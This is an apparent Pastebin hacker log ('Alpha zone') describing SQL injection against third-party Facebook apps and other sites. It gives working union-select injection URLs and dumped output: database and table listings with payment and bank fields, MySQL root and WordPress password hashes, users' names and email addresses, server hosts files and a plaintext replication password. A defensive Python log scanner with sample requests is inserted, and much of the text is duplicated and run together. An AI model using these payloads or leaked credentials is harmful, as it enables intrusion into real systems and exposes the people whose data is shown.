Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
and other....
oooooooooooooooooooooooooooo

O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.

Writing exploits, I got the following:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1

ooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
5.0.45-log <= ALERT!!!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log

super = ] Now, we just can say that there is SQL Injection Vulnerability
http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]

Now we know that there is MySql 5.0.45-log
Then let's write another exploit to display tables with information_schema.tables:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1

oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
201 <= ALERT!!! 201 tables!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo

http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log

1) AdCode 2) AdTrack 3) Admin_DataStore 4) Admin_User 5) Challenges 6) ChallengesCompleted 7) Comments 8) ContactEmails 9) Content 10) ContentImages 11) FeaturedTemplate 12) FeaturedWidgets 13) Feeds 14) FolderLinks 15) Folders 16) ForumTopics 17) Log 18) LogDumps 19) Newswire 20) NotificationMessages 21) Notifications 22) Orders 23) OutboundMessages 24) Photos 25) Prizes 26) RawExtLinks 27) RawSessions 28) SessionLengths 29) Sites 30) Subscriptions 31) SurveyMonkeys 32) SystemStatus 33) Templates 34) User 35) UserBlogs 36) UserCollectives 37) UserInfo 38) UserInvites 39) Videos 40) WeeklyScores 41) Widgets 42) cronJobs 43) fbSessions

Admin_User
1) id 2) name 3) email 4) password 5) userid 6) ncUid 7) level

User
1) userid 2) ncUid 3) name 4) email 5) isAdmin 6) isBlocked 7) votePower 8) remoteStatus 9) isMember 10) isModerator 11) isSponsor 12) isEmailVerified 13) isResearcher 14) acceptRules 15) optInStudy 16) optInEmail 17) optInProfile 18) optInFeed 19) optInSMS 20) dateRegistered 21) eligibility 22) cachedPointTotal 23) cachedPointsEarned 24) cachedPointsEarnedThisWeek 25) cachedPointsEarnedLastWeek 26) cachedStoriesPosted 27) cachedCommentsPosted 28) userLevel

http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]

Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community

DATABASE
1) information_schema 2) signalpa_CelebrityPuzzle 3) signalpa_EBF 4) signalpa_appNotification 5) signalpa_appnetwork 6) signalpa_dailyscriptures 7) signalpa_ebayfeed 8) signalpa_fbmFundRraise 9) signalpa_fbmFundRraisebeta 10) signalpa_netcards 11) signalpa_paypal 12) signalpa_thepuzzle

signalpa_fbmFundRraise
1) Campaigns 2) Campaigns_Temp 3) FB_theme 4) IfundDollars 5) Languages 6) Payments 7) Paymentsoops 8) Supporters 9) Users 10) Withdrawals 11) invites 12) invites_copy 13) mp_passwords 14) payment_codes 15) txt_codes 16) valid_servers 17) weeklyBonus

Column: Users
1) id 2) name 3) email 4) mobile_no 5) address 6) country 7) password 8) organisation 9) date_created 10) date_updated 11) status 12) facebook_id 13) isFacebookFan 14) verify 15) paypalUse 16) paypalEmail 17) bacUse 18) bacAcc 19) bacName 20) bacLocation 21) bacCountry 22) bacIBAN 23) bacSort_code 24) current_rank 25) new_rank 26) cronjob 27) max_fundraise

Column: mp_passwords
1) id 2) password 3) username 4) status 5) number 6) rc 7) referer 8) transID 9) currency 10) transType 11) amount 12) confirmed 13) date

signalpa_paypal
1) paypal_cart_info 2) paypal_payment_info 3) paypal_subscription_info

[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:

Column: paypal_cart_info
1) txnid 2) itemname 3) itemnumber 4) os0 5) on0 6) os1 7) on1 8) quantity 9) invoice 10) custom

Column : paypal_payment_info
1) firstname 2) lastname 3) buyer_email 4) street 5) city 6) state 7) zipcode 8) memo 9) itemname 10) itemnumber 11) os0 12) on0 13) os1 14) on1 15) quantity 16) paymentdate 17) paymenttype 18) txnid 19) mc_gross 20) mc_fee 21) paymentstatus 22) pendingreason 23) txntype 24) tax 25) mc_currency 26) reasoncode 27) custom 28) country 29) datecreation

http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]

Current Database : tv
Database User : tomkincaid@ps5008.dreamhost.com
MySQL Version : 5.0.45-log

DATABASES
1) information_schema 2) astro 3) candukincaid 4) cemeteries 5) churchwpdb 6) countdownapp 7) crush 8) dare 9) friendiq 10) giants 11) hookup 12) jauntlet 13) loccus 14) luciacanduwp 15) maps 16) martisor 17) mediax 18) mostlikely 19) music 20) pimpfriends 21) plans 22) politicsapp 23) postergifts 24) posters2 25) projectbasecamp 26) pwnfriends 27) quiz 28) seeall 29) send 30) supporter 31) swapu 32) tomsapps 33) travelbug

tab.send
1) app 2) item 3) itemforuser 4) neverblue 5) user

Columns user(12454)
1) userid 2) siteid 3) appkey 4) session 5) points 6) added 7) removed

Tab. candukincaid
1) wp_comments 2) wp_links 3) wp_options 4) wp_post**** 5) wp_posts 6) wp_px_albumPhotos 7) wp_px_albums 8) wp_px_galleries 9) wp_px_photos 10) wp_px_plugins 11) wp_term_relationships 12) wp_term_taxonomy 13) wp_terms 14) wp_user**** 15) wp_users

Column wp_users
1) ID 2) user_login 3) user_pass 4) user_nicename 5) user_email 6) user_url 7) user_registered 8) user_activation_key 9) user_status 10) display_name
etc...

http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]

> ~ inj3ct0r_facebook_exploit [ENTER]
root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220

http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]

Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community

http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]

>plucky@localhost : facebook : 4.0.13-log

etc...
=] Next xD

Database: thetvdb
User: thetvdb@localhost
Version: 5.0.51a-24-log

[Database]: thetvdb
[1]aka_seriesname [2]apiusers [3]banners [4]deletions [5]genres [6]imgstatus [7]languages [8]mirrors [9]networks [10]ratings [11]runtimes [12]seriesactors [13]seriesupdates [14]translation_episodename [15]translation_episodeoverview [16]translation_labels [17]translation_seriesname [18]translation_seriesoverview [19]tvepisodes [20]tvseasons [21]tvseries [22]user_episodes [23]users

users:
id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites, favorites_displaymode,bannerlimit,banneragreement,active,uniqueid, lastupdatedby_admin,mirrorupdate

[userpass]
[1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
[2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
[3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
[4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
[5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
[6] 3d801aa532c1cec3ee82d87a99fdf63f

[Database]: wiki
[24]archive [25]categorylinks [26]externallinks [27]filearchive [28]hitcounter [29]image [30]imagelinks [31]interwiki [32]ipblocks [33]job [34]langlinks [35]logging [36]math [37]objectcache [38]oldimage [39]page [40]page_restrictions [41]pagelinks [42]querycache [43]querycache_info [44]querycachetwo [45]recentchanges [46]redirect [47]revision [48]searchindex [49]site_stats [50]templatelinks [51]text [52]trackbacks [53]transcache [54]user [55]user_groups [56]user_newtalk [57]watchlist

user:
user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time, user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token, user_email_token_expires,user_registration,user_editcount

['user_name'] : ['user_pass']

---------------------------------------------------------------------------------------------------------------------------------------------------

read /etc/hosts

127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

----------------------------------

/etc/my.cnf

#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 5
#master-host=69.63.176.141
#master-user=romis_user
#master-password=romis0123
#master-connect-retry=60
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14

I think we found a sufficient number of vulnerabilities!
---------------------------

0x03

So .. Moving on to the fun friends

To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]

..> Exploit start
. + . + . + . + . + . + .
wp_posts post_password
wp_users user_pass
done.....

WordPress! oO one of the modules installed in facebook is Wordpress!

check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1

oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
3 <= ALERT! Users! =]
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
oooooooooooooooooooooooooooo

..> Crach_exploit [ENTER]

user:
admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.

cracker:
admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com

see request:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--

goOd =] Nice Hacking old school xD

0x04
[Conclusion]

There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update!

(Alpha zone Exploit Database)

0x05
[Greetz]

Greetz all Member Alpha zone
GoOd luck Hackers! =]
https://www.facebook.com/AlphaZoneOfficial like us ^
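A defender-side view of the requests quoted in the log above, as an added example that is not part of the original paste: a small access-log scanner that flags integer parameters carrying non-integer values and decodes `+`, `%28` and double-encoded forms before matching. The log lines, the parameter allowlist, the marker names and the severity labels are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: these parameters (the ones named in the log above) must be plain integers.
NUMERIC_PARAMS = {"id", "cid", "areaid", "user_id"}

# Markers matching the request strings quoted in the log above (labels are hypothetical).
SQL_MARKERS = [
    ("union-select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("version-probe", re.compile(r"@@version", re.I)),
    ("string-concat", re.compile(r"\bconcat(_ws)?\s*\(", re.I)),
    ("comment-tail", re.compile(r"--(\s|$)|/\*")),
]

# Common/combined access-log format: ip, identity, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2528 -> %28 -> '(') up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target):
    """Return (parameter, reason) pairs for one request target."""
    reasons = []
    # parse_qsl already turns '+' into a space and decodes one layer of %XX.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,18}", value):
            reasons.append((name, "non-integer"))
        for label, pattern in SQL_MARKERS:
            if pattern.search(value):
                reasons.append((name, label))
    return reasons


def scan(lines):
    """Scan access-log lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = inspect_target(match.group("target"))
        if not reasons:
            continue
        # A bare type violation is a probe; any SQL marker upgrades it.
        has_marker = any(label != "non-integer" for _, label in reasons)
        hits.append({
            "ip": match.group("ip"),
            "target": match.group("target"),
            "severity": "injection" if has_marker else "probe",
            "reasons": reasons,
        })
    return hits


# Constructed sample lines (documentation IP ranges, hypothetical paths and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /show.php?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /show.php?id=inj3ct0r HTTP/1.1" 200 9211',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /show.php?id=1+and+1=2+union+select+@@version--+1 HTTP/1.1" 200 9502',
    '198.51.100.7 - - [01/Jan/2024:10:00:14 +0000] '
    '"GET /show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29'
    '+from+wp_users+limit+1,1-- HTTP/1.1" 200 9410',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /fundraise.php?cid=42&ref=union+square HTTP/1.1" 200 3100',
    '198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] '
    '"GET /area.php?areaid=1%2520union%2520select%25201 HTTP/1.1" 200 2800',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        labels = ", ".join(f"{p}:{r}" for p, r in hit["reasons"])
        print(f'{hit["severity"]:9} {hit["ip"]:14} {labels}')
```

The type check on its own would have rejected every request shown in the log; the markers only add triage detail, and PHP warnings like the ones quoted above should never reach the response in production (`display_errors` off, errors logged server-side).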
Pastebin.com Tools & Applications
iPhone/iPad Windows Firefox Chrome WebOS Android Mac Opera Click.to UNIX WinPhone
create new paste  |  api  |  trends  |  users  |  faq  |  tools  |  privacy  |  contact  |  stats  |  go pro
Follow us: pastebin on facebook  |  pastebin on twitter  |  pastebin in the news
Pastebin v3.1 rendered in: 0.027 seconds
English translation AlpHa zONE data leak by cybxr :D and LEgit Hacker [0x00] [Introduction] [0x01] [First impressions] [0x02] [Search for bugs] [0x03] [Inj3ct0r Crash Exploit] [0x04] [Conclusion] [0x05] [Greetz] __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\ \/\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \ \ \ \_\ \/> </\ \ \_\ \ \ \_\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Introduction] + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system. We did not change the main page, do not sell backup server does not delete files. We have demonstrated the flaw in the system. Start =] .. __ __ _ /'__`\ /'__`\ /' \ /\ \/\ \ __ _/\ \/\ \/\_, \ \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ \ \ \_\ \/> </\ \ \_\ \ \ \ \ \ \____//\_/\_\\ \____/ \ \_\ \/___/ \//\/_/ \/___/ \/_/ [First impressions] At first glance, FaceBook well protected social network. Scanning FaceBook server did not give nothing interesting ... ) ..> Initiating Parallel DNS resolution of 1 host. Completed Parallel DNS resolution of 1 host. Initiating SYN Stealth Scan Scanning facebook.com (69.63.181.11) [1000 ports] Discovered open port 443/tcp on 69.63.181.11 Discovered open port 80/tcp on 69.63.181.11 Completed SYN Stealth Scan 13.16s elapsed (1000 total ports) Initiating Service scan Scanning 2 services on facebook.com (69.63.181.11) Service scan Timing: About 50.00% done; ETC: Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host) NSE: Script scanning 69.63.181.11. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 22:41 Completed NSE at 22:41, 0.38s elapsed NSE: Script Scanning completed. Nmap scan report for facebook.com (69.63.181.11) Host is up (0.17s latency). Hostname facebook.com resolves to 4 IPs. 
Only scanned 69.63.181.11 rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https go ahead .. =] __ __ ___ /'__`\ /'__`\ /'___`\ /\ \/\ \ __ _/\ \/\ \/\_\ /\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__ \ \ \_\ \/> </\ \ \_\ \ // /_\ \ \ \____//\_/\_\\ \____//\______/ \/___/ \//\/_/ \/___/ \/_____/ [Search for bugs] We use GoOgle.com request: Facebook+Vulnerability [search] We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities but all this can be found by searching : http://inj3ct0r.com/search All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com request: site:facebook.com WARNING error =\ fuck... Let us not lose heart) Hackers are not looking for easy ways Visit Facebook.com Let us search bugs in Web Apps. http://www.facebook.com/robots.txt oooooooooooooooooooooooooooo User-agent: * Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: Slurp Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: msnbot Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied. Sitemap: http://www.facebook.com/sitemap.php 00000000000000000000000000000000 nothing interesting =\ http://apps.facebook.com/tvshowchat/ I looked closely, I noticed links http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability... 
check: http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r ooooooooooooooooooooooooooo Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164 and other.... oooooooooooooooooooooooooooo O_o opsss! After sitting for a while, I realized that one of the servers is on MySql. 
Writing exploits, I got the following: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1 ooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 5.0.45-log <= ALERT!!! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... 
oooooooooooooooooooooooooooo Database : adminclt_testsite Database User : adminclt_13@209.68.2.10 MySQL Version : 5.0.67-log super = ] Now, we just can say that there is SQL Injection Vulnerability http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability] Now we know that there is MySql 5.0.45-log Then let's write another exploit to display tables with information_schema.tables: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 oooooooooooooooooooooooooooo Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116 Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38 Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/ 201 <= ALERT!!! 201 tables! Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123 and other.... 
    oooooooooooooooooooooooooooo

    http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]

    Database      : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log

    1) AdCode 2) AdTrack 3) Admin_DataStore 4) Admin_User 5) Challenges
    6) ChallengesCompleted 7) Comments 8) ContactEmails 9) Content
    10) ContentImages 11) FeaturedTemplate 12) FeaturedWidgets 13) Feeds
    14) FolderLinks 15) Folders 16) ForumTopics 17) Log 18) LogDumps
    19) Newswire 20) NotificationMessages 21) Notifications 22) Orders
    23) OutboundMessages 24) Photos 25) Prizes 26) RawExtLinks 27) RawSessions
    28) SessionLengths 29) Sites 30) Subscriptions 31) SurveyMonkeys
    32) SystemStatus 33) Templates 34) User 35) UserBlogs 36) UserCollectives
    37) UserInfo 38) UserInvites 39) Videos 40) WeeklyScores 41) Widgets
    42) cronJobs 43) fbSessions

    Admin_User
    1) id 2) name 3) email 4) password 5) userid 6) ncUid 7) level

    User
    1) userid 2) ncUid 3) name 4) email 5) isAdmin 6) isBlocked 7) votePower
    8) remoteStatus 9) isMember 10) isModerator 11) isSponsor
    12) isEmailVerified 13) isResearcher 14) acceptRules 15) optInStudy
    16) optInEmail 17) optInProfile 18) optInFeed 19) optInSMS
    20) dateRegistered 21) eligibility 22) cachedPointTotal
    23) cachedPointsEarned 24) cachedPointsEarnedThisWeek
    25) cachedPointsEarnedLastWeek 26) cachedStoriesPosted
    27) cachedCommentsPosted 28) userLevel

    http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]

    Current Database : signalpa_fbmFundRraise
    Database User    : signalpa_rockaja@localhost
    MySQL Version    : 5.0.85-community

    DATABASE
    1) information_schema 2) signalpa_CelebrityPuzzle 3) signalpa_EBF
    4) signalpa_appNotification 5) signalpa_appnetwork
    6) signalpa_dailyscriptures 7) signalpa_ebayfeed 8) signalpa_fbmFundRraise
    9) signalpa_fbmFundRraisebeta 10) signalpa_netcards 11) signalpa_paypal
    12) signalpa_thepuzzle

    signalpa_fbmFundRraise
    1) Campaigns 2) Campaigns_Temp 3) FB_theme 4) IfundDollars 5) Languages
    6) Payments 7) Paymentsoops 8) Supporters 9) Users 10) Withdrawals
    11) invites 12) invites_copy 13) mp_passwords 14) payment_codes
    15) txt_codes 16) valid_servers 17) weeklyBonus

    Column: Users
    1) id 2) name 3) email 4) mobile_no 5) address 6) country 7) password
    8) organisation 9) date_created 10) date_updated 11) status
    12) facebook_id 13) isFacebookFan 14) verify 15) paypalUse 16) paypalEmail
    17) bacUse 18) bacAcc 19) bacName 20) bacLocation 21) bacCountry
    22) bacIBAN 23) bacSort_code 24) current_rank 25) new_rank 26) cronjob
    27) max_fundraise

    Column: mp_passwords
    1) id 2) password 3) username 4) status 5) number 6) rc 7) referer
    8) transID 9) currency 10) transType 11) amount 12) confirmed 13) date

    signalpa_paypal
    1) paypal_cart_info 2) paypal_payment_info 3) paypal_subscription_info

    Column: paypal_cart_info
    1) txnid 2) itemname 3) itemnumber 4) os0 5) on0 6) os1 7) on1
    8) quantity 9) invoice 10) custom

    Column : paypal_payment_info
    1) firstname 2) lastname 3) buyer_email 4) street 5) city 6) state
    7) zipcode 8) memo 9) itemname 10) itemnumber 11) os0 12) on0 13) os1
    14) on1 15) quantity 16) paymentdate 17) paymenttype 18) txnid
    19) mc_gross 20) mc_fee 21) paymentstatus 22) pendingreason 23) txntype
    24) tax 25) mc_currency 26) reasoncode 27) custom 28) country
    29) datecreation

    http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]

    Current Database : tv
    Database User    : tomkincaid@ps5008.dreamhost.com
    MySQL Version    : 5.0.45-log

    DATABASES
    1) information_schema 2) astro 3) candukincaid 4) cemeteries
    5) churchwpdb 6) countdownapp 7) crush 8) dare 9) friendiq 10) giants
    11) hookup 12) jauntlet 13) loccus 14) luciacanduwp 15) maps 16) martisor
    17) mediax 18) mostlikely 19) music 20) pimpfriends 21) plans
    22) politicsapp 23) postergifts 24) posters2 25) projectbasecamp
    26) pwnfriends 27) quiz 28) seeall 29) send 30) supporter 31) swapu
    32) tomsapps 33) travelbug

    tab.send
    1) app 2) item 3) itemforuser 4) neverblue 5) user

    Columns user(12454)
    1) userid 2) siteid 3) appkey 4) session 5) points 6) added 7) removed

    Tab. candukincaid
    1) wp_comments 2) wp_links 3) wp_options 4) wp_post**** 5) wp_posts
    6) wp_px_albumPhotos 7) wp_px_albums 8) wp_px_galleries 9) wp_px_photos
    10) wp_px_plugins 11) wp_term_relationships 12) wp_term_taxonomy
